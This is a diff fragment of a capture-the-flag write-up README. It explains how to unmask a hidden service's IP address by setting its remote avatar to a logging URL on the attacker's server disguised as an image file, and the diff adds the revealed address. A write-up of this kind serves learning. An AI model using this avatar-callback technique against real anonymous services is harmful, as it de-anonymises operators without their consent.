conor-99/HackTrinity19Writeups/README.md

 ?>
 ```

-If we make this URL look like an image file http://myserver.com/log.php?i=image.png` and then set it as our remote avatar then we'll find the hidden service's IP address in the file `log.txt`.
+If we make this URL look like an image file http://myserver.com/log.php?i=image.png` and then set it as our remote avatar then we'll find the hidden service's IP address in the file `log.txt`:

+`95.179.146.250`

 ### Nat a flag